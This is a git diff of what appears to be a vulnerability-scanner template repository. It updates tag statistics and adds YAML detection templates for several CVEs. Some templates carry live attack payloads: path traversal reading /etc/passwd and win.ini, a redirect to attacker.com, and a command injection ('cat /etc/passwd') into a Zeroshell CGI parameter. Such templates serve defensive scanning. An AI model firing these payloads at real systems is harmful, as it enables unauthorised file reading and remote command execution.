web3storage | 1 | | | | | | | | | -| wordcloud | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| cve2021wordpress | 1 | | | | | | | | | +| dribbble | 1 | | | | | | | | | | directions | 1 | | | | | | | | | -| gstorage | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| fontawesome | 1 | | | | | | | | | -| helpdesk | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| fhem | 1 | | | | | | | | | -| particle | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| onkyo | 1 | | | | | | | | | -| mkdocs | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| restler | 1 | | | | | | | | | -| flexbe | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| jeecg-boot | 1 | | | | | | | | | -| omi | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| alquist | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | +| alfresco | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| adoptapet | 1 | | | | | | | | | | formalms | 1 | | | | | | | | | -| daybyday | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| cves2001 | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| alltube | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| gunicorn | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| elementor | 1 | | | | | | | | | -| pirelli | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| redmine | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| lokalise | 1 | | | | | | | | | -| mojoauth | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| nifi | 1 | | | | | | | | | -| issabel | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| piwigo | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| radius | 1 | | | | | | | | | +| petfinder | 1 | | | | | | | | | +| veeam | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| myanimelist | 1 | | | | | | | | | +| kvm | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| improvmx | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| acemanager | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| alquist | 1 | | | | | | | | | +| seopanel | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| b2bbuilder | 1 | | | | | | | | | | overflow | 1 | | | | | | | | | -| siteomat | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| livehelperchat | 1 | | | | | | | | | -| open-redirect | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| cve2000 | 1 | | | | | | | | | -| xds | 1 | | | | | | | | | -| oki | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | +| smartsheet | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | | sar2html | 1 | | | | | | | | | +| gnuboard | 1 | | | | | | | | | +| siemens | 1 | | | | | | | | | +| richfaces | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| unifi | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| server | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| ncbi | 1 | | | | | | | | | +| eventtickets | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| kenesto | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| gocron | 1 | | | | | | | | | +| onkyo | 1 | | | | | | | | | +| adfs | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| getgrav | 1 | | | | | | | | | +| phoronix | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| web-dispatcher | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| web3storage | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| malshare | 1 | | | | | | | | | +| ptr | 1 | | | | | | | | | +| stytch | 1 | | | | | | | | | +| cliniccases | 1 | | | | | | | | | +| pollbot | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| stackstorm | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| biqsdrive | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| unisharp | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| code42 | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| mx | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| sso | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| superwebmailer | 1 | | | | | | | | | +| h2 | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| taiga | 1 | | | | | | | | | +| graphiql | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| dnn | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| phabricator | 1 | | | | | | | | | +| goip | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| alchemy | 1 | | | | | | | | | +| blockfrost | 1 | | | | | | | | | +| gerapy | 1 | | | | | | | | | +| launchdarkly | 1 | | | | | | | | | +| clearbit | 1 | | | | | | | | | +| adiscon | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| optimizely | 1 | | | | | | | | | +| sauter | 1 | | | | | | | | | +| securepoint | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| asanhamayesh | 1 | | | | | | | | | +| memory-pipes | 1 | | | | | | | | | +| edgemax | 1 | | | | | | | | | +| malwarebazaar | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| argocd | 1 | | | | | | | | | +| weboftrust | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| zeppelin | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| pinata | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| webex | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| tuxedo | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| elementor | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| ecosys | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| emerson | 1 | | | | | | | | | +| seowon | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| hetzner | 1 | | | | | | | | | +| yishaadmin | 1 | | | | | | | | | +| dixell | 1 | | | | | | | | | +| bible | 1 | | | | | | | | | +| idor | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| oki | 1 | | | | | | | | | +| pastebin | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| goanywhere | 1 | | | | | | | | | +| nerdgraph | 1 | | | | | | | | | +| newsletter | 1 | | | | | | | | | +| dubbo | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| appveyor | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| openresty | 1 | | | | | | | | | +| wordcloud | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| xamr | 1 | | | | | | | | | +| wowza | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| livehelperchat | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| slstudio | 1 | | | | | | | | | +| jreport | 1 | | | | | | | | | +| jeecg-boot | 1 | | | | | | | | | +| thedogapi | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| box | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| matomo | 1 | | | | | | | | | +| ucs | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| pypicloud | 1 | | | | | | | | | +| smuggling | 1 | | | | | | | | | +| fhem | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| urlscan | 1 | | | | | | | | | +| issabel | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| hrsale | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| threatq | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| mastodon | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| zipkin | 1 | | | | | | | | | +| calendarific | 1 | | | | | | | | | +| festivo | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| loytec | 1 | | | | | | | | | +| activeadmin | 1 | | | | | | | | | +| jwt | 1 | | | | | | | | | +| yaws | 1 | | | | | | | | | +| etherpad | 1 | | | | | | | | | +| sast | 1 | | | | | | | | | +| dahua | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| billquick | 1 | | | | | | | | | +| bing | 1 | | | | | | | | | +| cve2002 | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| rwebserver | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| contactform | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| comfortel | 1 | | | | | | | | | +| knowage | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| lfw | 1 | | | | | | | | | +| twig | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| ldap | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| google-earth | 1 | | | | | | | | | +| jumpcloud | 1 | | | | | | | | | +| concrete5 | 1 | | | | | | | | | +| netbeans | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| cgit | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| admidio | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| micro | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| dicoogle | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| shortcode | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| ipvpn | 1 | | | | | | | | | +| piluscart | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| xmpp | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| shadoweb | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| mongo-express | 1 | | | | | | | | | +| apigee | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| fcm | 1 | | | | | | | | | | kerio | 1 | | | | | | | | | -| ecshop | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| lumis | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| clansphere | 1 | | | | | | | | | +| vercel | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| lantronix | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| crestron | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| nownodes | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| coinapi | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| harvardart | 1 | | | | | | | | | +| hdnetwork | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| siteomat | 1 | | | | | | | | | +| ncomputing | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| virustotal | 1 | | | | | | | | | +| distance | 1 | | | | | | | | | +| fontawesome | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| iconfinder | 1 | | | | | | | | | +| fanwei | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| ocs-inventory | 1 | | | | | | | | | +| opnsense | 1 | | | | | | | | | +| bitquery | 1 | | | | | | | | | +| spinnaker | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| ametys | 1 | | | | | | | | | +| cname | 1 | | | | | | | | | +| caddy | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| dbt | 1 | | | | | | | | | +| particle | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| activecollab | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| ninjaform | 1 | | | | | | | | | +| idera | 1 | | | | | | | | | +| purestorage | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 3f7c5644c0..fbf944aae0 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 | -| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 | -| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 | -| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 | -| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | | -| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | | -| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | | -| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | | -| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | | +| cve | 1056 | daffainfo | 544 | cves | 1061 | info | 1067 | http | 2905 | +| panel | 446 | dhiyaneshdk | 406 | exposed-panels | 447 | high | 789 | file | 57 | +| lfi | 430 | pikpikcu | 313 | vulnerabilities | 421 | medium | 622 | network | 49 | +| xss | 335 | pdteam | 257 | technologies | 227 | critical | 384 | dns | 17 | +| wordpress | 329 | geeknik | 174 | exposures | 199 | low | 169 | | | +| exposure | 282 | dwisiswant0 | 163 | misconfiguration | 188 | unknown | 6 | | | +| rce | 268 | 0x_akoko | 114 | workflows | 185 | | | | | +| cve2021 | 251 | gy741 | 109 | token-spray | 147 | | | | | +| tech | 238 | princechaddha | 109 | default-logins | 77 | | | | | | wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | | diff --git a/cves/2010/CVE-2010-1540.yaml b/cves/2010/CVE-2010-1540.yaml index 1bc5d76633..69956acbc1 100644 --- a/cves/2010/CVE-2010-1540.yaml +++ b/cves/2010/CVE-2010-1540.yaml @@ -1,16 +1,17 @@ id: CVE-2010-1540 + info: name: Joomla! Component com_blog - Directory Traversal author: daffainfo severity: high description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. - remediation: Upgrade to a supported version. reference: | - https://www.exploit-db.com/exploits/11625 - https://www.cvedetails.com/cve/CVE-2010-1540 tags: cve,cve2010,joomla,lfi classification: cve-id: CVE-2010-1540 + requests: - method: GET path: @@ -23,4 +24,5 @@ requests: - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2010/CVE-2010-1601.yaml b/cves/2010/CVE-2010-1601.yaml index adea054fa7..23a11eb61b 100644 --- a/cves/2010/CVE-2010-1601.yaml +++ b/cves/2010/CVE-2010-1601.yaml @@ -1,16 +1,17 @@ id: CVE-2010-1601 + info: name: Joomla! Component JA Comment - Local File Inclusion author: daffainfo severity: high description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. - remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12236 - https://www.cvedetails.com/cve/CVE-2010-1601 tags: cve,cve2010,joomla,lfi classification: cve-id: CVE-2010-1601 + requests: - method: GET path: @@ -23,4 +24,5 @@ requests: - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2010/CVE-2010-1602.yaml b/cves/2010/CVE-2010-1602.yaml index 24c6ab5d3d..c4ba030f87 100644 --- a/cves/2010/CVE-2010-1602.yaml +++ b/cves/2010/CVE-2010-1602.yaml @@ -5,7 +5,6 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12283 - https://www.cvedetails.com/cve/CVE-2010-1602 @@ -26,4 +25,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/02/15 +# Enhanced by mp on 2022/03/07 diff --git a/cves/2010/CVE-2010-1607.yaml b/cves/2010/CVE-2010-1607.yaml index c3bc374891..d42c423c71 100644 --- a/cves/2010/CVE-2010-1607.yaml +++ b/cves/2010/CVE-2010-1607.yaml @@ -5,7 +5,6 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12316 - https://www.cvedetails.com/cve/CVE-2010-1607 @@ -26,4 +25,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/02/15 +# Enhanced by mp on 2022/03/07 diff --git a/cves/2010/CVE-2010-1715.yaml b/cves/2010/CVE-2010-1715.yaml index fff88827c5..62eb5fa734 100644 --- a/cves/2010/CVE-2010-1715.yaml +++ b/cves/2010/CVE-2010-1715.yaml @@ -1,16 +1,17 @@ id: CVE-2010-1715 + info: name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion author: daffainfo severity: high description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12174 - https://www.cvedetails.com/cve/CVE-2010-1715 tags: cve,cve2010,joomla,lfi classification: cve-id: CVE-2010-1715 + requests: - method: GET path: @@ -23,4 +24,5 @@ requests: - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + +# Enhanced by mp on 2022/03/10 diff --git a/cves/2017/CVE-2017-9833.yaml b/cves/2017/CVE-2017-9833.yaml new file mode 100644 index 0000000000..32ba227b0b --- /dev/null +++ b/cves/2017/CVE-2017-9833.yaml @@ -0,0 +1,31 @@ +id: CVE-2017-9833 + +info: + name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges + author: 0x_Akoko + severity: high + description: The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials. + reference: + - https://www.exploit-db.com/exploits/42290 + - https://www.cvedetails.com/cve/CVE-2017-9833 + tags: boa,lfr,lfi,cve,cve2017 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-9833 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/cves/2018/CVE-2018-12296.yaml b/cves/2018/CVE-2018-12296.yaml new file mode 100644 index 0000000000..faa7cc7f06 --- /dev/null +++ b/cves/2018/CVE-2018-12296.yaml @@ -0,0 +1,37 @@ +id: CVE-2018-12296 +info: + name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure + author: princechaddha + severity: high + description: Insufficient access control in /api/external/7.0/system.System.get_infos in Seagate NAS OS version 4.3.15.1 allows attackers to obtain information about the NAS without authentication via empty POST requests. + reference: + - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12296 + tags: cve,cve2018,seagate,nasos,disclosure,unauth + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-12296 + cwe-id: CWE-732 + +requests: + - raw: + - | + POST /api/external/7.0/system.System.get_infos HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + + matchers: + - type: word + part: body + words: + - '"version":' + - '"serial_number":' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"version": "([0-9.]+)"' diff --git a/cves/2018/CVE-2018-12300.yaml b/cves/2018/CVE-2018-12300.yaml new file mode 100644 index 0000000000..aac189bfd8 --- /dev/null +++ b/cves/2018/CVE-2018-12300.yaml @@ -0,0 +1,28 @@ +id: CVE-2018-12300 + +info: + name: Seagate NAS OS 4.3.15.1 - Open redirect + author: 0x_Akoko + severity: medium + description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. + reference: + - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 + - https://www.cvedetails.com/cve/CVE-2018-12300 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-12300 + cwe-id: CWE-601 + tags: cve,cve2018,redirect,seagate,nasos + +requests: + - method: GET + + path: + - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2019/CVE-2019-12725.yaml b/cves/2019/CVE-2019-12725.yaml index a381601f64..3b92fcfa2f 100644 --- a/cves/2019/CVE-2019-12725.yaml +++ b/cves/2019/CVE-2019-12725.yaml @@ -2,7 +2,7 @@ id: CVE-2019-12725 info: name: Zeroshell 3.9.0 Remote Command Execution - author: dwisiswant0 + author: dwisiswant0,akincibor severity: critical description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters. remediation: Upgrade to 3.9.5. Be aware this product is no longer supported. @@ -20,14 +20,17 @@ info: requests: - method: GET path: - - "{{BaseURL}}/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27" + - "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW=" + matchers-condition: and matchers: - type: status status: - 200 + - type: regex + part: body regex: - - "((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+" + - "root:.*:0:0:" # Enhanced by mp on 2022/02/04 diff --git a/cves/2020/CVE-2020-13158.yaml b/cves/2020/CVE-2020-13158.yaml new file mode 100644 index 0000000000..eabc15c664 --- /dev/null +++ b/cves/2020/CVE-2020-13158.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-13158 +info: + name: Artica Proxy before 4.30.000000 Community Edition - Directory Traversal + author: 0x_Akoko + severity: high + description: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter. + reference: + - https://github.com/InfoSec4Fun/CVE-2020-13158 + - https://sourceforge.net/projects/artica-squid/files/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-13158 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-13158 + cwe-id: CWE-22 + tags: cve,cve2020,artica,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/cves/2020/CVE-2020-15050.yaml b/cves/2020/CVE-2020-15050.yaml new file mode 100644 index 0000000000..c3a0c4953d --- /dev/null +++ b/cves/2020/CVE-2020-15050.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-15050 + +info: + name: Suprema BioStar2 - Local File Inclusion (LFI) + author: gy741 + severity: high + description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal. + reference: + - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html + - https://www.supremainc.com/en/support/biostar-2-pakage.asp + - https://nvd.nist.gov/vuln/detail/CVE-2020-15050 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.50 + cve-id: CVE-2020-15050 + tags: cve,cve2020,lfi,suprema,biostar2 + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini" + + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/cves/2020/CVE-2020-7943.yaml b/cves/2020/CVE-2020-7943.yaml new file mode 100644 index 0000000000..1f5454db70 --- /dev/null +++ b/cves/2020/CVE-2020-7943.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-7943 + +info: + name: Puppet Server and PuppetDB sensitive information disclosure + severity: high + author: c-sh0 + description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information + reference: + - https://puppet.com/security/cve/CVE-2020-7943 + - https://nvd.nist.gov/vuln/detail/CVE-2020-7943 + - https://tickets.puppetlabs.com/browse/PDB-4876 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-7943 + cwe-id: CWE-276 + tags: cve,cve2020,puppet,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics/v1/mbeans" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "application/json" + + - type: word + part: body + words: + - "trapperkeeper" diff --git a/cves/2021/CVE-2021-3002.yaml b/cves/2021/CVE-2021-3002.yaml new file mode 100644 index 0000000000..781aba2d77 --- /dev/null +++ b/cves/2021/CVE-2021-3002.yaml @@ -0,0 +1,43 